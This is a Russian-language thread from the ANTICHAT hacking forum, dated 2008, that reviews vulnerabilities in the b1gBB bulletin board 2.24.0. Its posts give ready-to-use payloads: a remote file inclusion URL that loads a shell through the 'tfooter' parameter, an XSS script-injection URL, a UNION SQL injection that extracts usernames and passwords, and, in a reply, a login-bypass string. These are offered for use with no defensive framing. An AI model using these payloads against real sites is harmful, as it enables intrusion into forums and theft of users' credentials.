HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

[Обзор уязвимостей b1gBB]
  #1  
Старый 16.04.2008, 23:31
baltazar
Banned
Регистрация: 30.03.2007
Сообщений: 344
С нами: 10061666

Репутация: 2438
По умолчанию [Обзор уязвимостей b1gBB]

PHP-Include
b1gbb 2.24.0
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре "tfooter" в сценарии footer.inc.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP.
Пример:
Код:
http://[host]/path/footer.inc.php?tfooter=[file]

Межсайтовый скриптинг

b1gbb 2.24.0
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему и выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «user» сценарием visitenkarte.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Пример:
Код:
/visitenkarte.php?user=%22%3E%3Cscript%3Ealert(1);%3C/script%3E

SQL-инъекция

b1gbb 2.24.0
Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием showthread.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Пример
Код:
//showthread.php?id=-1%20union%20all%20select%200,1,2,3,4,5,6, concat(username,passwort),8%20FROM%20 cebb_user%20%20where%20id=1/*

XSS

Код:
/visitenkarte.php?user=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
Exploite
Код:
# b1gBB (b1g Bulletion Board) (footer.inc.php) Remote File Inclusion
Vulnerabilities

# D.Script :
     http://switch.dl.sourceforge.net/sourceforge/b1gbb/b1gbb-2.24.0.zip

# V.Code :
     include $tfooter

# In :
     footer.inc.php

# Exploits :
http://www.name/path/footer.inc.php?tfooter=shell?


# Discovered by:
     Rf7awy
x59@hotmail.it

Последний раз редактировалось baltazar; 16.04.2008 в 23:34..
 
Ответить с цитированием

  #2  
Старый 16.04.2008, 23:46
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
С нами: 10516826

Репутация: 3742


По умолчанию

и обход авторизации при magic_quotes off

bla' or 1=1/*
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей vBulletin] bandera Уязвимости CMS / форумов 167 17.10.2019 18:14
[Обзор уязвимостей в форумных движках] Grey Уязвимости CMS / форумов 49 02.04.2015 17:48
[Обзор уязвимостей Ikonboard] _-[A.M.D]HiM@S-_ Уязвимости CMS / форумов 6 26.12.2007 19:39



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.